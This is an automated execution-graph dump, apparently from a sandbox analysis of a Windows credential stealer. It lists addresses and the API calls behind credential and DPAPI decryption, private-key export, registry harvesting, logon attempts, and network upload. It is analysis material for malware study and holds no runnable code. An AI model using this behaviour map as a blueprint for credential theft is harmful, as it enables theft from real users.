                  execution_graph 12064 40c587 12065 40c596 12064->12065 12066 40c59a MultiByteToWideChar 12064->12066 12076 4018cf LocalAlloc 12066->12076 12068 40c5b7 MultiByteToWideChar StgOpenStorage 12071 40c660 12068->12071 12072 40c5eb 12068->12072 12069 4018b8 LocalFree 12070 40c67b 12069->12070 12071->12069 12072->12071 12077 4018cf LocalAlloc 12072->12077 12074 40c620 12075 4018b8 LocalFree 12074->12075 12075->12071 12076->12068 12077->12074 8758 40fe88 8759 410061 8758->8759 8762 40fe96 8758->8762 8762->8759 8763 40fed4 wsprintfA 8762->8763 8765 40ff51 GetTempPathA 8762->8765 8766 4018b8 LocalFree 8762->8766 8767 40ff75 GetTickCount wsprintfA CreateDirectoryA 8762->8767 8776 403d6d 8762->8776 8784 401788 8762->8784 8764 401e4c 6 API calls 8763->8764 8764->8762 8765->8762 8766->8762 8772 40ffa9 8767->8772 8768 401df8 LocalAlloc lstrlen lstrlen lstrcpy lstrcat 8768->8772 8769 401e4c 6 API calls 8769->8772 8771 40fffb lstrlen 8773 4026dd 19 API calls 8771->8773 8772->8768 8772->8769 8772->8771 8774 4018b8 LocalFree 8772->8774 8791 401463 ExitProcess 8772->8791 8775 410016 ShellExecuteA 8773->8775 8774->8762 8775->8772 8777 403d7a 8776->8777 8797 403bff 8777->8797 8780 403db2 8780->8762 8781 403bff 22 API calls 8782 403da9 8781->8782 8783 4018b8 LocalFree 8782->8783 8783->8780 8786 40179a 8784->8786 8785 4017c9 8785->8762 8786->8785 8787 4017a6 GlobalFix 8786->8787 8787->8785 8788 4017b5 8787->8788 8827 402497 8788->8827 8792 40148c 8791->8792 8793 4014df 8791->8793 8794 4014bc 8792->8794 8795 4014d7 CloseHandle 8792->8795 8796 401422 WriteFile 8792->8796 8793->8772 8794->8795 8795->8793 8796->8792 8824 4018cf LocalAlloc 8797->8824 8799 403c13 8825 4018cf LocalAlloc 8799->8825 8801 403c20 8826 4018cf LocalAlloc 8801->8826 8803 403c2d InternetCrackUrlA 8804 403c74 8803->8804 8805 403c7a 8803->8805 8804->8805 8806 403c7f InternetCreateUrlA 8804->8806 8808 4018b8 LocalFree 8805->8808 8806->8805 8807 403ca4 InternetCrackUrlA 8806->8807 8807->8805 8809 403ce5 
8807->8809 8810 403d55 8808->8810 8809->8805 8811 403ced wsprintfA 8809->8811 8812 4018b8 LocalFree 8810->8812 8814 403800 5 API calls 8811->8814 8813 403d5d 8812->8813 8815 4018b8 LocalFree 8813->8815 8816 403d12 8814->8816 8817 403d65 8815->8817 8816->8805 8818 403d18 lstrlen 8816->8818 8817->8780 8817->8781 8819 403884 send 8818->8819 8820 403d2f 8819->8820 8822 403a78 10 API calls 8820->8822 8823 403d33 closesocket 8820->8823 8822->8823 8823->8805 8824->8799 8825->8801 8826->8803 8832 4018cf LocalAlloc 8827->8832 8829 4024ab 8830 4018b8 LocalFree 8829->8830 8831 4017c1 GlobalUnWire 8830->8831 8831->8785 8832->8829 8526 4105d6 SetUnhandledExceptionFilter 8527 4105e0 8526->8527 8538 40fa90 8527->8538 8529 4105e5 8530 410601 RevertToSelf 8529->8530 8531 410607 8529->8531 8530->8531 8543 410223 8531->8543 8533 410616 8549 41032d 8533->8549 8535 41061b 8565 410065 8535->8565 8537 410620 8539 40faa3 8538->8539 8540 40faa4 8538->8540 8539->8529 8541 40fae9 8540->8541 8542 40fabf GetTickCount 8540->8542 8541->8529 8542->8540 8544 410236 8543->8544 8547 410237 8543->8547 8544->8533 8545 41024a 8545->8533 8546 402aaa LocalFree LocalAlloc WideCharToMultiByte WideCharToMultiByte 8546->8547 8547->8545 8547->8546 8596 4018cf LocalAlloc 8547->8596 8550 410341 8549->8550 8558 410342 8549->8558 8550->8535 8551 410355 8551->8535 8552 410374 lstrcmpiA 8553 41038b LogonUserA 8552->8553 8552->8558 8553->8558 8554 41043a 741D1B10 8554->8558 8556 4103b9 lstrlen LCMapStringA 8556->8558 8559 4103df LogonUserA 8556->8559 8557 41049f ImpersonateLoggedOnUser 8557->8558 8558->8551 8558->8552 8558->8553 8558->8554 8558->8557 8560 4018b8 LocalFree 8558->8560 8561 4104c0 8558->8561 8562 4104db CloseHandle 8558->8562 8563 410417 LogonUserA 8558->8563 8564 4104ba RevertToSelf 8558->8564 8597 402a1d lstrlen 8558->8597 8559->8558 8560->8558 8561->8558 8561->8562 8562->8558 8563->8554 8563->8558 8564->8561 8566 410077 8565->8566 8567 410078 8565->8567 8566->8537 8601 4018cf LocalAlloc 8567->8601 
8569 410088 GetTickCount wsprintfA 8602 4018cf LocalAlloc 8569->8602 8571 4100b2 8603 4018cf LocalAlloc 8571->8603 8573 4100ca 8604 4018cf LocalAlloc 8573->8604 8575 4100dd GetModuleFileNameA GetTempPathA 8576 41012f ExitProcess 8575->8576 8577 41011f lstrcat 8575->8577 8577->8576 8596->8547 8600 4018cf LocalAlloc 8597->8600 8599 402a2f lstrcpy 8599->8556 8600->8599 8601->8569 8602->8571 8603->8573 8604->8575 8833 402bda 8834 402be4 8833->8834 8836 402bfc 8834->8836 8837 402968 8834->8837 8838 402978 8837->8838 8839 40298a 8837->8839 8838->8839 8840 402991 LookupPrivilegeValueA 8838->8840 8839->8834 8841 402a07 8840->8841 8842 4029ad GetCurrentProcess OpenProcessToken 8840->8842 8845 402a16 8841->8845 8846 402a0e CloseHandle 8841->8846 8843 4029c5 8842->8843 8844 4029ee AdjustTokenPrivileges 8842->8844 8843->8844 8844->8841 8845->8834 8846->8845 11722 41051e OleInitialize 11740 402530 11722->11740 11725 40fa90 GetTickCount 11726 41052d 11725->11726 11757 402c01 11726->11757 11728 410537 11729 41053b 11728->11729 11730 41054e 11728->11730 11741 4024d6 2 API calls 11740->11741 11742 40253f 11741->11742 11743 4024d6 2 API calls 11742->11743 11744 40254e 11743->11744 11745 4024d6 2 API calls 11744->11745 11746 40255d 11745->11746 11747 4024d6 2 API calls 11746->11747 11748 40256c 11747->11748 11749 4024d6 2 API calls 11748->11749 11750 40257b 11749->11750 11751 4024d6 2 API calls 11750->11751 11752 40258a 11751->11752 11753 4024d6 2 API calls 11752->11753 11754 402599 11753->11754 11755 4024d6 2 API calls 11754->11755 11756 4025a8 11755->11756 11756->11725 11758 402c14 11757->11758 11759 402c15 11757->11759 11758->11728 11760 402c31 11759->11760 11761 402c36 GetCurrentProcess OpenProcessToken 11759->11761 11760->11728 11762 402ce2 11761->11762 11763 402c52 GetTokenInformation 11761->11763 11762->11728 8435 41a1e0 8436 41a1f0 8435->8436 8437 41a326 VirtualProtect VirtualProtect 8436->8437 8438 41a2ea LoadLibraryA 8436->8438 8440 41a35a 8437->8440 8439 41a301 8438->8439 
8439->8436 8441 41a308 GetProcAddress 8439->8441 8440->8440 8441->8439 8442 41a320 ExitProcess 8441->8442 8448 40fc62 8450 40fc6a 8448->8450 8449 40fc7e 8450->8449 8466 4017d5 8450->8466 8452 40fc96 8452->8449 8480 401675 8452->8480 8454 40fca4 8454->8449 8486 4016db 8454->8486 8456 40fcb2 8456->8449 8493 401a27 8456->8493 8458 40fcc5 8458->8449 8459 401675 2 API calls 8458->8459 8460 40fcd3 8459->8460 8460->8449 8461 4016db 2 API calls 8460->8461 8462 40fce1 8461->8462 8462->8449 8463 40fce7 8462->8463 8503 401aec GetTickCount 8463->8503 8468 4017ea 8466->8468 8467 4018a9 8467->8452 8468->8467 8469 4017fa GlobalFix 8468->8469 8469->8467 8470 40180d 8469->8470 8513 4018cf LocalAlloc 8470->8513 8472 401826 8514 4018cf LocalAlloc 8472->8514 8474 40183f 8475 401855 GlobalUnWire 8474->8475 8476 40186b 8475->8476 8515 4018b8 8476->8515 8479 4018b8 LocalFree 8479->8467 8481 40168e 8480->8481 8482 40169a GlobalFix 8481->8482 8484 4016bf 8481->8484 8483 4016a9 8482->8483 8482->8484 8485 4016b4 GlobalUnWire 8483->8485 8484->8454 8485->8484 8487 4016f4 8486->8487 8488 401735 8487->8488 8489 401709 GlobalFix 8487->8489 8488->8456 8490 401719 8489->8490 8492 40174b 8489->8492 8491 401724 GlobalUnWire 8490->8491 8491->8492 8492->8456 8495 401a3f 8493->8495 8494 401add 8494->8458 8495->8494 8496 401a4f GlobalFix 8495->8496 8496->8494 8497 401a5e 8496->8497 8518 4018cf LocalAlloc 8497->8518 8499 401a69 8500 401a7a GlobalUnWire lstrlen 8499->8500 8501 401a9a 8500->8501 8502 4018b8 LocalFree 8501->8502 8502->8494 8513->8472 8514->8474 8516 4018c1 LocalFree 8515->8516 8517 4018a1 8515->8517 8516->8517 8517->8479 8518->8499 8520 401226 ExitProcess 8521 401241 8520->8521 8522 401245 ReadFile 8520->8522 8523 401263 CloseHandle 8522->8523 8524 401271 8522->8524 8524->8522 8525 401289 CloseHandle 8524->8525 12016 40b8e7 12017 40ba2a 12016->12017 12018 4018b8 LocalFree 12017->12018 12019 40ba32 12018->12019 8443 410630 8444 41062f GetTickCount 8443->8444 8446 410642 8443->8446 8444->8443 
8447 41064b ExitProcess 8446->8447 12135 40bc36 12136 40bc4d 12135->12136 12137 40bc44 12135->12137 12137->12136 12138 40bcc8 CryptUnprotectData 12137->12138 12138->12136 12139 40bcfb 12138->12139 12139->12136 12140 40bd1f LocalFree 12139->12140 12140->12136 12141 40bd37 12140->12141 12141->12136 12150 4018cf LocalAlloc 12141->12150 12143 40bd53 12144 40bd64 lstrlen StrCmpNIA 12143->12144 12145 40bd80 lstrlen StrCmpNIA 12144->12145 12146 40bd98 12144->12146 12145->12146 12147 40bd9c lstrlen StrCmpNIA 12146->12147 12149 40bdb4 12146->12149 12147->12149 12148 4018b8 LocalFree 12148->12136 12149->12148 12150->12143 8609 40fd78 8619 403ffb WSAStartup 8609->8619 8611 40fe61 8612 40fe4d 8612->8611 8637 4026dd RegCreateKeyA 8612->8637 8615 40fd7d 8615->8611 8615->8612 8616 40fe2c Sleep 8615->8616 8618 40fb14 LocalFree LocalAlloc GlobalFix GlobalUnWire StrStrIA 8615->8618 8620 403f97 8615->8620 8627 401bc0 8615->8627 8616->8615 8618->8615 8619->8615 8621 403fec 8620->8621 8622 403fa6 8620->8622 8621->8615 8622->8621 8623 403fc4 GlobalFix 8622->8623 8623->8621 8624 403fd3 8623->8624 8662 403de5 8624->8662 8629 401bd8 8627->8629 8628 401c7e 8628->8615 8629->8628 8630 401bf5 GlobalFix 8629->8630 8630->8628 8631 401c01 8630->8631 8742 4018cf LocalAlloc 8631->8742 8633 401c0c 8634 401c1d GlobalUnWire 8633->8634 8635 401c36 8634->8635 8636 4018b8 LocalFree 8635->8636 8636->8628 8638 402701 RegSetValueExA 8637->8638 8639 402723 8637->8639 8640 40271a 8638->8640 8641 40271b RegCloseKey 8638->8641 8642 4027f0 8639->8642 8643 40272b GetTempPathA 8639->8643 8640->8641 8641->8639 8642->8611 8643->8642 8644 402744 8643->8644 8644->8642 8645 40274f CreateDirectoryA 8644->8645 8646 402769 8645->8646 8647 402789 8646->8647 8648 40276d 8646->8648 8650 401df8 5 API calls 8647->8650 8743 401df8 8648->8743 8652 402798 ExitProcess 8650->8652 8651 40277e 8748 401e4c 8651->8748 8654 4027d6 8652->8654 8655 4027be 8652->8655 8658 4027e5 8654->8658 8659 4027da DeleteFileA 8654->8659 8657 401422 
WriteFile 8655->8657 8660 4027cc CloseHandle 8657->8660 8661 4018b8 LocalFree 8658->8661 8659->8658 8660->8654 8661->8642 8693 4018cf LocalAlloc 8662->8693 8664 403e00 8694 4018cf LocalAlloc 8664->8694 8666 403e0d 8695 4018cf LocalAlloc 8666->8695 8668 403e1a InternetCrackUrlA 8669 403e61 8668->8669 8670 403e67 8668->8670 8669->8670 8671 403e6c InternetCreateUrlA 8669->8671 8673 4018b8 LocalFree 8670->8673 8671->8670 8672 403e91 InternetCrackUrlA 8671->8672 8672->8670 8674 403ed2 8672->8674 8675 403f71 8673->8675 8674->8670 8676 403edd wsprintfA 8674->8676 8677 4018b8 LocalFree 8675->8677 8696 403800 socket 8676->8696 8679 403f79 8677->8679 8681 4018b8 LocalFree 8679->8681 8680 403f05 8680->8670 8685 403f16 lstrlen 8680->8685 8682 403f81 8681->8682 8683 403f8f GlobalUnWire 8682->8683 8684 4018b8 LocalFree 8682->8684 8683->8621 8684->8683 8704 403884 8685->8704 8693->8664 8694->8666 8695->8668 8697 403819 8696->8697 8698 40381b 8696->8698 8697->8680 8701 40384e 8698->8701 8703 40383d 8698->8703 8726 4037c6 inet_addr 8698->8726 8699 403861 connect 8699->8697 8700 403875 closesocket 8699->8700 8700->8697 8701->8700 8703->8699 8703->8700 8727 4037d6 gethostbyname 8726->8727 8728 4037e2 8726->8728 8727->8728 8728->8703 8742->8633 8744 401e02 lstrlen lstrlen 8743->8744 8756 4018cf LocalAlloc 8744->8756 8747 401e31 lstrcpy lstrcat 8747->8651 8749 401e56 lstrlen lstrlen 8748->8749 8757 4018cf LocalAlloc 8749->8757 8752 401e85 lstrcpy lstrcat 8753 401ea2 8752->8753 8754 401eaa 8752->8754 8755 4018b8 LocalFree 8753->8755 8754->8652 8755->8754 8756->8747 8757->8752 8847 40fbbb 8848 40fbc3 8847->8848 8851 40f984 8848->8851 8850 40fbe9 8852 40f997 8851->8852 8853 40f998 GetPEB 8851->8853 8852->8850 8854 40f9ba 8853->8854 8855 40fa88 8854->8855 8938 40240a 8854->8938 8942 40d3be 8854->8942 8964 40c2bb 8854->8964 8968 40e4b7 8854->8968 8972 40c230 8854->8972 8984 40eeae 8854->8984 8990 40aaa8 8854->8990 8996 40dc27 8854->8996 9000 408124 8854->9000 9006 40c823 8854->9006 9037 
40a0a2 8854->9037 9050 40d9a1 8854->9050 9060 4069a0 8854->9060 9064 407e20 8854->9064 9070 40f81f 8854->9070 9082 40901f 8854->9082 9090 40c31d 8854->9090 9094 40a21c 8854->9094 9098 40cf9b 8854->9098 9108 40de9b 8854->9108 9114 40e89b 8854->9114 9118 40d796 8854->9118 9122 40a016 8854->9122 9136 406915 8854->9136 9146 404a95 8854->9146 9160 406d14 8854->9160 9164 40f093 8854->9164 9178 40b012 8854->9178 9182 409f8f 8854->9182 9190 40c98a 8854->9190 9200 407589 8854->9200 9206 409f08 8854->9206 9214 40e907 8854->9214 9240 407086 8854->9240 9282 407685 8854->9282 9292 405f04 8854->9292 9298 409e81 8854->9298 9306 407a7f 8854->9306 9326 40e5ff 8854->9326 9330 40c1ff 8854->9330 9334 4045fd 8854->9334 9360 40cb74 8854->9360 9374 40c6f0 8854->9374 9382 40cbee 8854->9382 9386 4055ed 8854->9386 9426 40c2ec 8854->9426 9430 40c769 8854->9430 9438 407e69 8854->9438 9448 406ce3 8854->9448 9452 40df62 8854->9452 9462 406ae0 8854->9462 9466 40735e 8854->9466 9472 40665e 8854->9472 9476 40dbde 8854->9476 9482 4069db 8854->9482 9494 40d35a 8854->9494 9504 40ca59 8854->9504 9527 40a257 8854->9527 9533 407754 8854->9533 9541 407853 8854->9541 9555 407ed1 8854->9555 9559 40e8d1 8854->9559 9563 404c51 8854->9563 9635 408f4f 8854->9635 9647 40e5ce 8854->9647 9651 40c1ce 8854->9651 9655 40c34e 8854->9655 9659 40e0cd 8854->9659 9663 4063cc 8854->9663 9667 40614b 8854->9667 9679 405acb 8854->9679 9713 40504b 8854->9713 9741 409dcb 8854->9741 9756 405cca 8854->9756 9794 40e449 8854->9794 9804 405e49 8854->9804 9812 409d44 8854->9812 9820 40eb43 8854->9820 9828 408c43 8854->9828 9861 4053c3 8854->9861 9888 40a1c2 8854->9888 9898 40f740 8854->9898 8855->8850 8939 402413 8938->8939 8940 40241f 8939->8940 8941 4018b8 LocalFree 8939->8941 8940->8854 8941->8939 8944 40d3d2 8942->8944 8943 40d5af 8943->8854 8944->8943 8945 40d43d CertOpenSystemStoreA 8944->8945 8945->8943 8953 40d457 8945->8953 8946 40d459 CertEnumCertificatesInStore 8947 40d469 CertCloseStore 8946->8947 8946->8953 8947->8943 
8949 40d487 lstrcmp 8949->8953 8951 40d4be lstrcmp 8952 40d4d3 CryptAcquireCertificatePrivateKey 8951->8952 8951->8953 8952->8953 8954 40d4f0 CryptGetUserKey 8952->8954 8953->8946 8953->8949 8953->8951 8955 4018b8 LocalFree 8953->8955 9922 4018cf LocalAlloc 8953->9922 8956 40d504 CryptExportKey 8954->8956 8957 40d57c CryptReleaseContext 8954->8957 8955->8953 8958 40d573 CryptDestroyKey 8956->8958 8959 40d51d 8956->8959 8957->8953 8958->8957 9923 4018cf LocalAlloc 8959->9923 8961 40d525 CryptExportKey 8963 40d542 8961->8963 8962 4018b8 LocalFree 8962->8958 8963->8962 8965 40c2cd 8964->8965 9924 40c13d 8965->9924 8969 40e4c9 8968->8969 8970 40c13d 46 API calls 8969->8970 8971 40e4d9 8970->8971 8971->8854 8973 40c242 8972->8973 8974 40c13d 46 API calls 8973->8974 8975 40c252 8974->8975 8976 401d71 6 API calls 8975->8976 8977 40c269 8976->8977 8978 40c2ac 8977->8978 8979 4041a6 41 API calls 8977->8979 8978->8854 8980 40c28a 8979->8980 8981 4041a6 41 API calls 8980->8981 8982 40c2a4 8981->8982 8983 4018b8 LocalFree 8982->8983 8983->8978 8985 40eec0 8984->8985 10205 40eba3 RegOpenKeyA 8985->10205 8988 40eba3 18 API calls 8989 40eee8 8988->8989 8989->8854 8995 40aaba 8990->8995 8994 40ab15 8994->8854 10217 40a875 8995->10217 8997 40dc39 8996->8997 10263 40439c 8997->10263 8999 40dc53 8999->8854 9001 408136 9000->9001 10282 407f0c RegOpenKeyA 9001->10282 9004 407f0c 14 API calls 9005 40815e 9004->9005 9005->8854 9013 40c836 9006->9013 9007 40c844 StrStrIA 9007->9013 9008 40c88b 9009 40439c 46 API calls 9008->9009 9011 40c8a2 9009->9011 9012 401d71 6 API calls 9011->9012 9014 40c8b9 9012->9014 9013->9007 9013->9008 9015 404351 41 API calls 9013->9015 9018 4018b8 LocalFree 9013->9018 10293 40242b 9013->10293 9016 401d71 6 API calls 9014->9016 9015->9013 9017 40c8d3 9016->9017 9019 401d71 6 API calls 9017->9019 9018->9013 9020 40c8ed 9019->9020 9021 401d71 6 API calls 9020->9021 9024 40c909 9021->9024 9022 4018b8 LocalFree 9023 40c962 9022->9023 9025 4018b8 LocalFree 
9023->9025 9036 40c94c 9024->9036 10303 4015cb 9024->10303 9026 40c96a 9025->9026 9030 40c936 9032 4015cb lstrlen 9030->9032 9034 40c941 9032->9034 9036->9022 9038 40a0b6 9037->9038 9039 401eb1 7 API calls 9038->9039 9040 40a0c0 9039->9040 9041 404351 41 API calls 9040->9041 9047 40a0dd 9040->9047 9044 40a0d8 9041->9044 9042 40a133 9042->8854 9043 40a0ee StrStrIA 9043->9047 9045 4018b8 LocalFree 9044->9045 9045->9047 9046 40242b 9 API calls 9046->9047 9047->9042 9047->9043 9047->9046 9048 404351 41 API calls 9047->9048 9049 4018b8 LocalFree 9047->9049 9048->9047 9049->9047 9051 40d9b3 9050->9051 10306 40d965 9051->10306 9054 40d965 46 API calls 9055 40d9ca 9054->9055 9056 40d965 46 API calls 9055->9056 9057 40d9d4 9056->9057 9058 40439c 46 API calls 9057->9058 9059 40d9eb 9058->9059 9059->8854 9061 4069b2 9060->9061 9062 40439c 46 API calls 9061->9062 9063 4069cc 9062->9063 9063->8854 9065 407e32 9064->9065 10315 407bba RegOpenKeyA 9065->10315 9068 407bba 14 API calls 9069 407e5a 9068->9069 9069->8854 10326 4015f0 9070->10326 9072 40f834 GetCurrentDirectoryA 10328 409c3c StrStrIA 9072->10328 9075 409c3c 83 API calls 9076 40f88b SetCurrentDirectoryA GetCurrentDirectoryA 9075->9076 9077 409c3c 83 API calls 9076->9077 9078 40f8cf 9077->9078 9079 409c3c 83 API calls 9078->9079 9080 40f8eb SetCurrentDirectoryA 9079->9080 9081 40f902 9080->9081 9081->8854 9083 409031 9082->9083 10542 408fd3 9083->10542 9086 408fd3 46 API calls 9087 409048 9086->9087 9088 408fd3 46 API calls 9087->9088 9089 409052 9088->9089 9089->8854 9091 40c32f 9090->9091 9092 40c13d 46 API calls 9091->9092 9093 40c33f 9092->9093 9093->8854 9095 40a22e 9094->9095 9096 40439c 46 API calls 9095->9096 9097 40a248 9096->9097 9097->8854 9099 40cfad 9098->9099 10553 40ccda 9099->10553 9102 401eb1 7 API calls 9103 40cfbf 9102->9103 9104 40cfe1 9103->9104 9105 4041a6 41 API calls 9103->9105 9104->8854 9106 40cfdc 9105->9106 9107 4018b8 LocalFree 9106->9107 9107->9104 9109 40dead 9108->9109 10573 40dc62 
RegOpenKeyA 9109->10573 9112 40dc62 14 API calls 9113 40ded5 9112->9113 9113->8854 9115 40e8ad 9114->9115 10584 40e85d 9115->10584 9117 40e8c2 9117->8854 9119 40d7a8 9118->9119 10607 40d5c0 RegOpenKeyA 9119->10607 9121 40d7b8 9121->8854 9123 40a028 9122->9123 9124 401d71 6 API calls 9123->9124 9125 40a042 9124->9125 9126 40a05f 9125->9126 9128 404351 41 API calls 9125->9128 9127 401d71 6 API calls 9126->9127 9129 40a076 9127->9129 9130 40a05a 9128->9130 9131 40a093 9129->9131 9133 404351 41 API calls 9129->9133 9132 4018b8 LocalFree 9130->9132 9131->8854 9132->9126 9134 40a08e 9133->9134 9135 4018b8 LocalFree 9134->9135 9135->9131 9137 406927 9136->9137 9138 40439c 46 API calls 9137->9138 9139 406941 9138->9139 9140 401d71 6 API calls 9139->9140 9143 40695a 9140->9143 9141 406984 10618 40668f RegOpenKeyA 9141->10618 9143->9141 9145 4018b8 LocalFree 9143->9145 9144 406991 9144->8854 9145->9141 9147 404aa7 9146->9147 10636 40491b RegOpenKeyA 9147->10636 9150 40491b 14 API calls 9151 404ac4 9150->9151 9152 40491b 14 API calls 9151->9152 9153 404ad1 9152->9153 10647 40480d RegOpenKeyA 9153->10647 9156 40480d 10 API calls 9157 404aeb 9156->9157 9158 40480d 10 API calls 9157->9158 9159 404af8 9158->9159 9159->8854 9161 406d26 9160->9161 9162 40439c 46 API calls 9161->9162 9163 406d40 9162->9163 9163->8854 9165 40f0a5 9164->9165 9166 40439c 46 API calls 9165->9166 9167 40f0bf 9166->9167 9168 40439c 46 API calls 9167->9168 9169 40f0d6 9168->9169 9170 40439c 46 API calls 9169->9170 9171 40f0ed 9170->9171 9172 40439c 46 API calls 9171->9172 9173 40f104 9172->9173 10656 40ef6c 9173->10656 9179 40b024 9178->9179 10697 40aed7 RegOpenKeyA 9179->10697 9181 40b034 9181->8854 9183 4015f0 9182->9183 9184 409fa4 GetCurrentDirectoryA 9183->9184 9185 409c3c 83 API calls 9184->9185 9186 409fdf 9185->9186 9187 409c3c 83 API calls 9186->9187 9188 409ffb SetCurrentDirectoryA 9187->9188 9189 40a012 9188->9189 9189->8854 9191 40c99c 9190->9191 9192 401d71 6 API calls 9191->9192 9193 40c9b2 
9192->9193 9194 40c9d9 9193->9194 9195 40242b 9 API calls 9193->9195 9194->8854 9196 40c9bc 9195->9196 9196->9194 9197 404351 41 API calls 9196->9197 9198 40c9d4 9197->9198 9199 4018b8 LocalFree 9198->9199 9199->9194 9201 40759b 9200->9201 10785 4073a7 RegOpenKeyA 9201->10785 9204 4073a7 14 API calls 9205 4075c3 9204->9205 9205->8854 9207 4015f0 9206->9207 9208 409f1d GetCurrentDirectoryA 9207->9208 9209 409c3c 83 API calls 9208->9209 9210 409f58 9209->9210 9211 409c3c 83 API calls 9210->9211 9212 409f74 SetCurrentDirectoryA 9211->9212 9213 409f8b 9212->9213 9213->8854 9215 40e919 9214->9215 9216 401d71 6 API calls 9215->9216 9217 40e933 9216->9217 9218 40e950 9217->9218 9219 404351 41 API calls 9217->9219 9220 401d71 6 API calls 9218->9220 9221 40e94b 9219->9221 9222 40e966 9220->9222 9224 4018b8 LocalFree 9221->9224 9223 40e983 9222->9223 9225 404351 41 API calls 9222->9225 9226 401d71 6 API calls 9223->9226 9224->9218 9227 40e97e 9225->9227 9228 40e99a 9226->9228 9229 4018b8 LocalFree 9227->9229 9230 40e9b7 9228->9230 9231 404351 41 API calls 9228->9231 9229->9223 9232 401d71 6 API calls 9230->9232 9233 40e9b2 9231->9233 9234 40e9cd 9232->9234 9235 4018b8 LocalFree 9233->9235 9236 40e9ea 9234->9236 9237 404351 41 API calls 9234->9237 9235->9230 9236->8854 9238 40e9e5 9237->9238 9239 4018b8 LocalFree 9238->9239 9239->9236 9241 407098 9240->9241 10796 406d4f RegOpenKeyA 9241->10796 9244 401d71 6 API calls 9245 4070bf 9244->9245 9246 4070dd 9245->9246 9247 401e4c 6 API calls 9245->9247 9248 401eb1 7 API calls 9246->9248 9249 4070ce 9247->9249 9250 4070e4 9248->9250 9251 406fbb 20 API calls 9249->9251 9252 40710d 9250->9252 9255 401e4c 6 API calls 9250->9255 9254 4070d8 9251->9254 9253 401eb1 7 API calls 9252->9253 9256 407114 9253->9256 9257 4018b8 LocalFree 9254->9257 9258 4070f3 9255->9258 9259 40713d 9256->9259 9261 401e4c 6 API calls 9256->9261 9257->9246 9260 401e4c 6 API calls 9258->9260 9262 401eb1 7 API calls 9259->9262 9263 4070fe 9260->9263 9264 407123 
9261->9264 9266 407144 9262->9266 10807 406fbb 9263->10807 9269 401e4c 6 API calls 9264->9269 9267 40716d 9266->9267 9270 401e4c 6 API calls 9266->9270 9267->8854 9268 407108 9272 40712e 9269->9272 9273 407153 9270->9273 9274 406fbb 20 API calls 9272->9274 9275 401e4c 6 API calls 9273->9275 9276 407138 9274->9276 9283 407697 9282->9283 10833 4075d2 RegOpenKeyA 9283->10833 9286 4075d2 9 API calls 9287 4076bf 9286->9287 9288 4075d2 9 API calls 9287->9288 9289 4076d2 9288->9289 9290 4075d2 9 API calls 9289->9290 9291 4076e4 9290->9291 9291->8854 9293 405f16 9292->9293 10841 405e8b 9293->10841 9296 405e8b 46 API calls 9297 405f3d 9296->9297 9297->8854 9299 4015f0 9298->9299 9300 409e96 GetCurrentDirectoryA 9299->9300 9301 409c3c 83 API calls 9300->9301 9302 409ed1 9301->9302 9303 409c3c 83 API calls 9302->9303 9304 409eed SetCurrentDirectoryA 9303->9304 9305 409f04 9304->9305 9305->8854 9316 407a93 9306->9316 9307 407b66 10856 407a33 9307->10856 9308 407aab StrStrA 9310 407b08 StrStrIA 9308->9310 9308->9316 9310->9316 9311 407ac4 lstrlen 9313 40242b 9 API calls 9311->9313 9313->9316 9314 407a33 46 API calls 9317 407b7a 9314->9317 9315 40242b 9 API calls 9315->9316 9316->9307 9316->9308 9316->9311 9316->9315 9320 404351 41 API calls 9316->9320 9323 4018b8 LocalFree 9316->9323 9318 407a33 46 API calls 9317->9318 9319 407b84 9318->9319 10867 4078c8 RegOpenKeyA 9319->10867 9320->9316 9323->9316 9324 4078c8 48 API calls 9325 407ba9 9324->9325 9325->8854 9327 40e611 9326->9327 9328 40439c 46 API calls 9327->9328 9329 40e62b 9328->9329 9329->8854 9331 40c211 9330->9331 9332 40c13d 46 API calls 9331->9332 9333 40c221 9332->9333 9333->8854 9335 404614 9334->9335 9336 404635 GetVersionExA 9335->9336 9337 404657 9336->9337 10878 40446a GetModuleHandleA 9337->10878 9339 40469d 10884 4018cf LocalAlloc 9339->10884 9341 4046b0 GetLocaleInfoA 10885 40159f 9341->10885 9343 4046df GetLocaleInfoA 9344 404708 9343->9344 10887 4044d2 9344->10887 9346 40470d 10895 40456c 9346->10895 9361 
Execution graph (fragment): the control-flow graph of AxgZVzUv8m.exe is rendered by the report's interactive viewer as a node/edge list (numeric node identifiers and function addresses in the 0x401569 to 0x40f7fb range) and is not reproduced here. The Windows API calls referenced by the graph nodes are: RegOpenKeyA, RegOpenKeyExA, RegQueryValueExA, RegEnumKeyExA, RegEnumValueA, RegCloseKey, CredEnumerateA, CredFree, CryptUnprotectData, SHGetFolderPathA, GetWindowsDirectoryA, GetCurrentDirectoryA, SetCurrentDirectoryA, GetFileAttributesA, FindFirstFileA, FindNextFileA, FindClose, GetPrivateProfileStringA, LocalAlloc, LocalFree, lstrlen, lstrlenW, lstrcpy, lstrcat, lstrcmpiA, wsprintfA, StrStrA, StrStrIA, StrStrIW, StrRChrIA, GetProcAddress, GetCurrentProcess, AllocateAndInitializeSid, CheckTokenMembership, FreeSid.
401df8 5 API calls 11488->11491 11490 4018b8 LocalFree 11489->11490 11492 408c1d 11490->11492 11493 408b16 11491->11493 11492->11463 11494 408b2d FindFirstFileA 11493->11494 11494->11489 11499 408b4c 11494->11499 11495 408bed FindNextFileA 11497 408c07 FindClose 11495->11497 11495->11499 11496 408b5e lstrcmpiA 11498 408b78 lstrcmpiA 11496->11498 11496->11499 11497->11489 11498->11499 11499->11495 11499->11496 11500 401df8 5 API calls 11499->11500 11501 401e4c 6 API calls 11499->11501 11500->11499 11502 408bba StrStrIA 11501->11502 11503 408bd5 11502->11503 11504 408be8 11502->11504 11505 408961 38 API calls 11503->11505 11506 4018b8 LocalFree 11504->11506 11505->11504 11506->11495 11593 401eb1 7 API calls 11592->11593 11594 405328 11593->11594 11595 4053bf 11594->11595 11596 401df8 5 API calls 11594->11596 11595->9868 11597 405340 11596->11597 11598 4051e3 29 API calls 11597->11598 11599 40534f 11598->11599 11600 4018b8 LocalFree 11599->11600 11601 405354 11600->11601 11602 401df8 5 API calls 11601->11602 11603 405361 11602->11603 11604 4051e3 29 API calls 11603->11604 11605 405370 11604->11605 11606 4018b8 LocalFree 11605->11606 11607 405375 11606->11607 11622 401d71 6 API calls 11621->11622 11624 4051bd 11622->11624 11623 4051df 11623->9878 11624->11623 11625 4018b8 LocalFree 11624->11625 11625->11623 11627 405202 11626->11627 11628 4051fd 11626->11628 11629 4018b8 LocalFree 11627->11629 11628->11627 11630 401df8 5 API calls 11628->11630 11631 405316 11629->11631 11632 405212 11630->11632 11631->9862 11650 405182 11632->11650 11635 4018b8 LocalFree 